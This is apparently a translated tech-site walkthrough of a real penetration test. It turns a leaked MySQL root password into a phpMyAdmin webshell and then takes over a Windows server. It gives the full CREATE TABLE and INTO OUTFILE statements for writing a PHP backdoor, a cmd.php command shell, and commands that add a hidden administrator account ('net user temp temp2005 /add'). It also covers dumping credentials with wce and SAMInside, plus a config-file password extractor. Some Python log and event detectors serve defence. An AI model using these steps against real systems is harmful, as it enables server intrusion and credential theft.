
How phpMyAdmin can be used with the MySQL root password to get a webshell

2025-01-28 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/03 Report--

This article describes how an attacker who holds the MySQL root password can turn phpMyAdmin access into a webshell, and then into control of the server. It is a worked walkthrough of one engagement, followed by privilege escalation on the Windows host.

Simeon

phpMyAdmin is a well-known web-based MySQL administration tool; it operates on the managed databases using a MySQL user account and password. During a penetration test, once a MySQL account and its password are obtained, the databases that account manages are readily accessible, and in combination with other weaknesses this can lead to webshell and then system-level access. The root account and password can be obtained by brute force or through source-code leaks. This article discusses obtaining the root credentials, using them in phpMyAdmin, and deriving a webshell from that access.

The main ways to use a MySQL root account and password through phpMyAdmin are:

(1) Read sensitive tables in every database: system configuration tables, the administrator tables of whatever CMS is installed, and user account tables. These yield administrator credentials and configuration data.

(2) Find the real physical path of the website. The path is needed to write a webshell out with INTO OUTFILE; the usual sources are PHP error messages, phpinfo() output and the application's own configuration tables.

(3) Write a one-line backdoor directly into the website directory, or into the phpMyAdmin directory, with a query statement.

(4) After obtaining a webshell on a Windows host, attempt privilege escalation.

(5) Some sites were compromised earlier and already carry a webshell, in particular a backdoor. If a backdoor is found, its password can be brute-forced.

(6) If the real path cannot be determined, a one-line webshell cannot be exported directly. Instead, log into the CMS with an administrator account recovered from the database and look for an exploitable weakness; for example, DedeCMS administrator accounts can be cracked, and the admin interface then allows a direct file upload that yields a webshell.

(7) If the target hosts more than one website, credentials recovered from one can be tried against adjacent or otherwise known systems, for example by scanning for SSH or MySQL logins with the same passwords.

(8) Many hosts that expose phpMyAdmin also suffer from directory listing and source-code exposure. The leaked code is used to recover the database password, and auditing it can reveal further vulnerabilities to exploit.

(9) Some phpMyAdmin versions have remote code execution and file inclusion vulnerabilities, through which a webshell can be obtained directly.

The following is a practical example.

1. Full port scan of the target IP

Enter the IP address in Nmap and select the "Intense scan, all TCP ports" profile. The results show that ports 135, 3306, 3389, 80 and others are open; figure 1 shows the details. In a real penetration test each open port is then visited in a browser one by one, although the obviously irrelevant ones can be skipped. Some cloud virtual machines (CVMs) open many ports in order to provide many services, and the more ports are exposed, the more potential vulnerabilities there are to exploit.

Figure 1 Port opening

2. Reverse-look up the domain names on the IP address

Query the IP at a reverse domain lookup site; as figure 2 shows, three websites are hosted on this IP.

Figure 2 Domain name reverse lookup

3. Visit the IP directly

Entering the IP directly in the browser reveals a phpMyAdmin directory, source code, database backup files and more under the web root, as shown in figure 3. Downloadable files include:

Http://182.xx.xxx.16/mxsy_newzs.sql

Http://182.xx.xxx.16/szcmsw.sql

Http://182.xx.xxx.16/szcmsw11.sql

Http://182.xx.xxx.16/hs.zip

Http://182.xx.xxx.16/Z-BlogPHP_1_4_Deeplue_150101.zip

Figure 3 Directory listing and other exposures on the CVM's IP

4. Get the database password

Download the leaked archives and the .sql files. Unpack the archives and look for the database configuration file. After unpacking hs.zip, the database configuration is found in common.inc.php in its data directory, shown in figure 4; the password there is clearly not the live database password, and the archive appears to be merely the source package of some CMS. Continuing through each leaked directory, the szcms1 directory turns out to hold two more archives, http://182.xx.xxx.16/szcms1/szcms.rar and http://182.xx.xxx.16/szcms1/szcms1.rar, shown in figure 5. Downloading and unpacking them yields the real database configuration file.

Figure 4 Contents of the database configuration file

Figure 5 Leaked source archives found a second time
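Step 4 is a manual search through unpacked source for the database configuration. The following is an added Python helper, not code from the article, that pulls database credentials out of the three PHP configuration styles these CMS packages typically use: DedeCMS-style `$cfg_dbpwd = '...';` assignments in data/common.inc.php, a ThinkPHP-style `'DB_PWD' => '...'` config array, and `define('DB_PASSWORD', '...')` calls. The sample file contents and every value in them are constructed; the file names in `CONFIG_FILE_NAMES` are an assumption about where such configs usually live.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed sample configuration files (hypothetical values) in the three
# PHP styles most often seen in leaked CMS source.
SAMPLE_DEDE = """<?php
//database connection settings
$cfg_dbhost = 'localhost';
$cfg_dbname = 'szcms';
$cfg_dbuser = 'root';
$cfg_dbpwd = 'not-the-real-one';
$cfg_dbprefix = 'dede_';
?>"""

SAMPLE_THINKPHP = """<?php
return array(
    'DB_TYPE' => 'mysql',
    'DB_HOST' => '127.0.0.1',
    'DB_NAME' => 'szcms',
    'DB_USER' => 'root',
    'DB_PWD'  => "p@ss'word",
    'DB_PORT' => '3306',
);"""

SAMPLE_DEFINE = """<?php
define('DB_HOST', 'localhost');
define('DB_USER', 'szcms');
define('DB_PASSWORD', 'secret');
define('DB_NAME', 'szcms');
"""

# A PHP string literal, single- or double-quoted, without escaped quotes inside.
# Good enough for config files; anything fancier needs a real PHP parser.
_STR = r"""(?:'([^']*)'|"([^"]*)")"""
VAR_RE = re.compile(r"\$(\w+)\s*=\s*" + _STR + r"\s*;")                  # $cfg_dbpwd = '...';
ARRAY_RE = re.compile(_STR + r"\s*=>\s*" + _STR)                          # 'DB_PWD' => '...'
DEFINE_RE = re.compile(r"define\s*\(\s*" + _STR + r"\s*,\s*" + _STR + r"\s*\)")  # define('DB_PASSWORD', '...')

# Normalised field name -> the config keys (lower-cased) that carry it.
FIELD_ALIASES = {
    "host": ("cfg_dbhost", "db_host", "dbhost", "hostname"),
    "user": ("cfg_dbuser", "db_user", "dbuser", "username"),
    "password": ("cfg_dbpwd", "db_pwd", "db_password", "dbpw", "dbpass", "password"),
    "database": ("cfg_dbname", "db_name", "dbname"),
}
# Assumed typical file names to look at first when walking an unpacked tree.
CONFIG_FILE_NAMES = {"common.inc.php", "config.php", "config.inc.php", "db.php", "database.php"}


def _first(*alternatives):
    """Return the first non-None regex group (the quote style that matched)."""
    for alt in alternatives:
        if alt is not None:
            return alt
    return ""


def _key_value_pairs(text: str) -> List[Tuple[str, str]]:
    pairs = []
    for m in VAR_RE.finditer(text):
        pairs.append((m.group(1), _first(m.group(2), m.group(3))))
    for m in ARRAY_RE.finditer(text):
        pairs.append((_first(m.group(1), m.group(2)), _first(m.group(3), m.group(4))))
    for m in DEFINE_RE.finditer(text):
        pairs.append((_first(m.group(1), m.group(2)), _first(m.group(3), m.group(4))))
    return pairs


def extract_db_credentials(text: str) -> Dict[str, str]:
    """Map host/user/password/database to the values found in a PHP config.
    The first occurrence of each field wins; unrelated keys are ignored."""
    found: Dict[str, str] = {}
    for key, value in _key_value_pairs(text):
        k = key.lower()
        for field, aliases in FIELD_ALIASES.items():
            if k in aliases and field not in found:
                found[field] = value
    return found


def scan_tree(root: str) -> Dict[str, Dict[str, str]]:
    """Walk an unpacked archive and report every config file that yields a password."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower() in CONFIG_FILE_NAMES:
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    creds = extract_db_credentials(fh.read())
                if "password" in creds:
                    hits[path] = creds
    return hits


if __name__ == "__main__":
    for sample in (SAMPLE_DEDE, SAMPLE_THINKPHP, SAMPLE_DEFINE):
        print(extract_db_credentials(sample))
```

The same extractor serves the defensive side of step 4: run `scan_tree` over the backups and source archives a web root is about to expose, and anything that returns a password is a file that must not be published.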

5. Log in to phpMyAdmin

Log in with the root password obtained from szcms1.rar, as shown in figure 6. Seven databases of interest are visible in the MySQL instance. A database can be selected and exported locally with "Export" (this is the notorious "dragging the database", a full dump of the data; try not to do it).

Figure 6 Logging in to phpMyAdmin

6. Export a one-line backdoor to the CVM

At present there are several ways to write out a one-line backdoor:

(1) Create a table

CREATE TABLE `mysql`.`roommoon` (`roommoon1` TEXT NOT NULL);

INSERT INTO `mysql`.`roommoon` (`roommoon1`) VALUES ('');

SELECT `roommoon1` FROM `mysql`.`roommoon` INTO OUTFILE 'd:/www/exehack.php';

DROP TABLE IF EXISTS `mysql`.`roommoon`;

The statements create the table roommoon in the mysql database with a single TEXT column roommoon1, insert the one-line PHP backdoor into that column (the page has stripped the payload from between the quotes of the INSERT, so it is not reproduced here), write the column out with INTO OUTFILE to a file under the website's real path, and finally drop the table.

Note: in phpMyAdmin, open the SQL tab and run the statements above. Because the table name is qualified with the mysql schema in every statement, it is not necessary to select the mysql database first. What must be changed is the real path and file name of the website: in this case "C:/WWW/szcms1/szcms/Public/exehack.php" rather than the placeholder "d:/www/exehack.php". INTO OUTFILE only works if the account holds the FILE privilege and secure_file_priv does not forbid that directory, and it refuses to overwrite a file that already exists.

(2) Export the one-line backdoor file directly

SELECT '' INTO OUTFILE 'd:/www/exehack.php';

(The PHP payload goes between the quotes; the page has it stripped, and the path in the page's statement is garbled, so the same placeholder path as in method (1) is used here.)

A result such as "Your SQL query has been executed successfully (query took 0.0006 seconds)" indicates that the backdoor file was written.

(3) A shell that executes commands directly

SELECT '' INTO OUTFILE 'd:/www/cmd.php';

(Again the PHP payload between the quotes and the directory part of the path are missing or garbled on the page; the file name cmd.php is taken from the usage below.)

Once this export succeeds, DOS commands can be executed directly: www.xxx.com/cmd.php?cmd= followed by the command to run.
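All three methods stand or fall on two server-side conditions that the article does not spell out: the account must hold the global FILE privilege, and the `secure_file_priv` variable must permit writing to the target directory (NULL disables INTO OUTFILE entirely). The following is an added Python example, not code from the article, that evaluates both conditions from the text a client gets back from `SHOW VARIABLES LIKE 'secure_file_priv'` and `SHOW GRANTS`, and builds the method (2) statement with correct string escaping. It does not connect to a server: the variable rows, the grants and the paths are constructed, hypothetical values, and the file content is a harmless marker rather than a webshell.

```python
import re
from typing import Iterable, Optional

# Constructed "name<TAB>value" rows as a client prints SHOW VARIABLES output.
SECURE_FILE_PRIV_ROWS = {
    "blocked": "secure_file_priv\tNULL",       # NULL: import/export disabled entirely (the hardened setting)
    "anywhere": "secure_file_priv\t",          # empty: any directory the mysqld service account can write
    "restricted": "secure_file_priv\tC:\\ProgramData\\MySQL\\Uploads\\",  # only under this directory
}
# Constructed SHOW GRANTS output for two accounts.
GRANTS_ROOT = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION"]
GRANTS_WEBAPP = ["GRANT SELECT, INSERT, UPDATE, DELETE ON `szcms`.* TO 'szcms'@'localhost'"]

GRANT_RE = re.compile(r"^GRANT (?P<privs>.+?) ON (?P<target>\S+) TO ", re.IGNORECASE)


def parse_secure_file_priv(row: str) -> Optional[str]:
    """Directory prefix the server will write under, '' when unrestricted,
    or None when the variable is NULL and INTO OUTFILE is refused outright."""
    name, _, value = row.partition("\t")
    if name.strip() != "secure_file_priv":
        raise ValueError("not a secure_file_priv row")
    value = value.strip()
    if value.upper() == "NULL":
        return None
    return value.replace("\\", "/")


def has_file_privilege(grants: Iterable[str]) -> bool:
    """FILE is a global privilege: it can only come from a grant ON *.*,
    either named explicitly or through ALL PRIVILEGES (the root case)."""
    for grant in grants:
        m = GRANT_RE.match(grant)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if m.group("target") == "*.*" and privs & {"ALL PRIVILEGES", "FILE"}:
            return True
    return False


def outfile_allowed(secure_file_priv_row: str, grants: Iterable[str], target_path: str) -> bool:
    """Can this account write target_path with INTO OUTFILE?  Both conditions
    must hold.  The prefix comparison is case-insensitive (Windows paths)."""
    if not has_file_privilege(grants):
        return False
    prefix = parse_secure_file_priv(secure_file_priv_row)
    if prefix is None:
        return False
    if prefix == "":
        return True
    normalized = target_path.replace("\\", "/").lower()
    return normalized.startswith(prefix.rstrip("/").lower() + "/")


def sql_quote(value: str) -> str:
    """Quote a value as a single-quoted MySQL string literal.  One-line PHP
    nearly always contains quotes, and unescaped quotes are the usual reason a
    pasted INTO OUTFILE statement fails with a syntax error."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


MARKER = "<?php echo 'outfile-write-ok'; ?>"   # harmless write probe, not a shell


def build_outfile_statement(target_path: str, content: str = MARKER) -> str:
    """Method (2) as a single statement.  Forward slashes work on Windows and
    avoid backslash escaping.  INTO OUTFILE never overwrites: if the file
    exists the server answers 'File ... already exists'."""
    path = target_path.replace("\\", "/")
    return "SELECT " + sql_quote(content) + " INTO OUTFILE " + sql_quote(path)


if __name__ == "__main__":
    target = r"C:\WWW\szcms1\szcms\Public\probe.php"
    for state, row in SECURE_FILE_PRIV_ROWS.items():
        print(state, outfile_allowed(row, GRANTS_ROOT, target))
    print(build_outfile_statement(target))
```

On the defensive side the same two checks are the fix: set `secure_file_priv` to NULL (or to a dedicated directory outside every web root) in my.cnf/my.ini, and never give an application account a grant ON *.* that carries FILE.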

In this case, after the export statement was executed the website went down and the CVM could no longer be reached over HTTP, which was discouraging. The next attempt was a direct connection with the MySQL client tool Navicat for MySQL: entering the IP address and the credentials connected successfully, as shown in figure 7. Lucky.

Figure 7 Connecting to the MySQL database with Navicat for MySQL

7. Get the real physical path of the website

Visiting http://182.xx.xxx.16/szcms1/szcms/Public/Home/p_w_picpaths/micro_r4_c2.png discloses the real physical path of the website, C:\WWW\szcms1\szcms\Tp\, as shown in figure 8.

Figure 8 Obtaining the real path

8. Export the webshell

Then run the following against the MySQL database (over the Navicat connection, since the site itself was no longer reachable):

CREATE TABLE `mysql`.`roommoon` (`roommoon1` TEXT NOT NULL);

INSERT INTO `mysql`.`roommoon` (`roommoon1`) VALUES ('');

SELECT `roommoon1` FROM `mysql`.`roommoon` INTO OUTFILE 'C:/WWW/szcms1/szcms/Public/exehack.php';

DROP TABLE IF EXISTS `mysql`.`roommoon`;

(As in step 6, the page strips the PHP payload from between the quotes of the INSERT, and the target path in the page's SELECT is garbled; the path used here is the one the note under method (1) gives for this site.)

The exported webshell is then requested in the browser, as shown in figure 9; if no error appears it is running. Adding the address to the backdoor manager of China Chopper (中国菜刀) gives a working webshell directly, as shown in figure 10.

Figure 9 Checking through the directory listing whether the file was written

Figure 10 Obtaining the webshell
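Every statement in steps 6 and 8 is visible to the database server, so the defender's counterpart to this procedure is a scan of the MySQL general query log (or an audit-plugin log) for file writes into a web root, LOAD_FILE reads, and scratch tables being created in the `mysql` system schema by a remote root login. The following is an added Python example, not code from the article: the log sample is constructed in the tab-separated format the MySQL 5.7/8.0 general log uses (timestamp, thread id, command, argument), the session user and host are hypothetical, and the web-root prefixes in `WEB_ROOTS` are an assumption to adjust per host.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed general query log excerpt (hypothetical values).  Thread 12 is a
# remote root session doing what step 8 describes; thread 13 is ordinary
# application traffic that must not be flagged.
SAMPLE_LOG = """\
2024-06-03T08:12:40.100000Z\t   12 Connect\troot@182.xx.xxx.20 on mysql using TCP/IP
2024-06-03T08:12:40.200000Z\t   12 Query\tSHOW DATABASES
2024-06-03T08:12:41.000000Z\t   12 Query\tCREATE TABLE `mysql`.`roommoon` (`roommoon1` TEXT NOT NULL)
2024-06-03T08:12:41.300000Z\t   12 Query\tSELECT `roommoon1` FROM `roommoon` INTO OUTFILE 'C:/WWW/szcms1/szcms/Public/exehack.php'
2024-06-03T08:12:41.400000Z\t   12 Query\tDROP TABLE IF EXISTS `roommoon`
2024-06-03T08:12:42.000000Z\t   13 Connect\tszcms@localhost on szcms using TCP/IP
2024-06-03T08:12:42.100000Z\t   13 Query\tSELECT id, title FROM news WHERE id = 42
2024-06-03T08:12:43.000000Z\t   12 Query\tSELECT LOAD_FILE('C:/WWW/szcms1/szcms/config.php')
2024-06-03T08:12:44.000000Z\t   12 Query\tSELECT 'export' INTO OUTFILE 'C:/ProgramData/MySQL/Uploads/report.csv'
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<tid>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")
OUTFILE_RE = re.compile(r"INTO\s+(OUTFILE|DUMPFILE)\s+'([^']*)'", re.IGNORECASE)
LOADFILE_RE = re.compile(r"\bLOAD_FILE\s*\(", re.IGNORECASE)
SYSTEM_SCHEMA_DDL_RE = re.compile(r"^\s*CREATE\s+TABLE\s+`?mysql`?\s*\.", re.IGNORECASE)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")   # server-executable targets
WEB_ROOTS = ("c:/www/", "c:/inetpub/", "/var/www/")                 # assumed document roots


@dataclass
class LogFinding:
    rule: str
    thread_id: int
    user: str       # user@host from the session's Connect line, "?" if unseen
    detail: str


def scan_general_log(text: str) -> List[LogFinding]:
    """Walk the log once, remembering which account owns each thread id, and
    emit a finding for every file-system touching statement.  Writes are split
    into two rules so a plain data export to the upload directory is visible
    but ranks below a script file dropped into a web root."""
    sessions: Dict[int, str] = {}
    findings: List[LogFinding] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # header line or multi-line statement continuation
        tid, cmd, arg = int(m.group("tid")), m.group("cmd"), m.group("arg")
        if cmd == "Connect":
            sessions[tid] = arg.split(" on ", 1)[0]
            continue
        if cmd != "Query":
            continue
        user = sessions.get(tid, "?")
        om = OUTFILE_RE.search(arg)
        if om:
            path = om.group(2).replace("\\", "/")
            low = path.lower()
            if low.endswith(SCRIPT_EXT) or low.startswith(WEB_ROOTS):
                findings.append(LogFinding("file-write-to-webroot", tid, user, path))
            else:
                findings.append(LogFinding("file-write", tid, user, path))
        if LOADFILE_RE.search(arg):
            findings.append(LogFinding("file-read", tid, user, arg))
        if SYSTEM_SCHEMA_DDL_RE.match(arg):
            findings.append(LogFinding("ddl-in-system-schema", tid, user, arg))
    return findings


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"{f.rule:24} thread={f.thread_id} user={f.user} {f.detail}")
```

The general log must be switched on (`general_log=ON`) for this to see anything, which is rarely the case in production; the same rules apply unchanged to the MySQL Enterprise Audit or MariaDB audit plugin output, where only `LINE_RE` changes.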

9. Privilege escalation on the CVM

(1) Dumping plaintext passwords with wce failed

Through China Chopper's virtual terminal, commands can be run directly. whoami shows that the webshell already runs with SYSTEM privileges. wce64.exe was uploaded and run as "wce64.exe -w" to dump the plaintext passwords of logged-on users, as shown in figure 11, but it returned nothing: no plaintext password could be obtained directly.

Figure 11 Executing commands

(2) Add an administrator directly

The earlier port scan showed that port 3389 is open on the CVM. Since the webshell runs commands, "net user temp temp2005 /add" followed by "net localgroup administrators temp /add" creates a user temp with the password temp2005 and puts it in the administrators group; figure 12 shows that it succeeded.

Figure 12 Adding the temp user to the administrators group

(3) Log in over 3389

Open mstsc.exe locally, enter the username and password, and log in to the CVM, as shown in figure 13.

Figure 13 Successful login to the CVM

(4) Obtain the administrator password hash and plaintext

After logging in to the cloud server, download SAMInside through the browser, as shown in figure 14, and dump the system's password hashes directly. Export the hashes and crack them locally with ophcrack.

Figure 14 Dumping the system hashes

Then upload a modified build of wce64 (altered to evade antivirus) once more and grab the passwords in one step, as shown in figure 15: the administrator password is "123321abc*".

Figure 15 Obtaining the system administrator password
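The escalation in step 9 leaves a characteristic trail in Windows process-creation auditing: the web server process (here the webshell ran under Apache/PHP as SYSTEM) spawning cmd.exe, and a `net user ... /add` followed by `net localgroup administrators ... /add`. The following is an added Python example, not code from the article, that applies those two rules to Security event 4688 records. The records are constructed with hypothetical values and assume the "Include command line in process creation events" policy is on, since without it `CommandLine` is empty; the process names in `WEB_SERVER_PROCESSES` are an assumption to extend for the stack in use.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed 4688 events (field names follow the event's XML EventData).
# The first three reproduce the step 9 sequence; the last two are benign.
SAMPLE_4688 = [
    {"SubjectUserName": "SYSTEM", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Apache24\bin\httpd.exe",
     "CommandLine": 'cmd.exe /c "whoami"'},
    {"SubjectUserName": "SYSTEM", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Apache24\bin\httpd.exe",
     "CommandLine": 'cmd.exe /c "net user temp temp2005 /add"'},
    {"SubjectUserName": "SYSTEM", "NewProcessName": r"C:\Windows\System32\net1.exe",
     "ParentProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net1 localgroup administrators temp /add"},
    {"SubjectUserName": "SYSTEM", "NewProcessName": r"C:\php\php-cgi.exe",
     "ParentProcessName": r"C:\Apache24\bin\httpd.exe",
     "CommandLine": "php-cgi.exe"},           # normal: the web server running PHP
    {"SubjectUserName": "ops", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},               # normal: an interactive admin session
]

WEB_SERVER_PROCESSES = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "php.exe"}
SHELL_PROCESSES = {"cmd.exe", "powershell.exe", "net.exe", "net1.exe", "whoami.exe"}
# net.exe hands "net user"/"net localgroup" to net1.exe, so both spellings appear in logs.
ADD_USER_RE = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\b", re.IGNORECASE)
ADD_ADMIN_RE = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b",
                          re.IGNORECASE)


@dataclass
class ProcessFinding:
    rule: str
    user: str       # SubjectUserName: the account the process ran as
    detail: str     # command line, or the account name being created/promoted


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def scan_process_events(events: List[Dict[str, str]]) -> List[ProcessFinding]:
    """Flag a shell spawned by a web server process (the webshell's command
    channel) and local account creation or promotion from any process.  The
    parent/child check is the robust signal: it fires on the first 'whoami',
    before any account is touched."""
    findings: List[ProcessFinding] = []
    for ev in events:
        child = _basename(ev["NewProcessName"])
        parent = _basename(ev["ParentProcessName"])
        cmdline = ev.get("CommandLine", "")
        user = ev.get("SubjectUserName", "?")
        if parent in WEB_SERVER_PROCESSES and child in SHELL_PROCESSES:
            findings.append(ProcessFinding("web-server-spawned-shell", user, cmdline))
        m = ADD_USER_RE.search(cmdline)
        if m:
            findings.append(ProcessFinding("local-account-created", user, m.group(1)))
        m = ADD_ADMIN_RE.search(cmdline)
        if m:
            findings.append(ProcessFinding("added-to-administrators", user, m.group(1)))
    return findings


if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_4688):
        print(f"{f.rule:26} user={f.user} {f.detail}")
```

Where command-line auditing is not available, events 4720 (account created) and 4732 (member added to a local group) carry the same account names and can be correlated on SubjectLogonId instead; they do not, however, show which process issued the command, which is why the 4688 parent/child rule is the one worth having.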
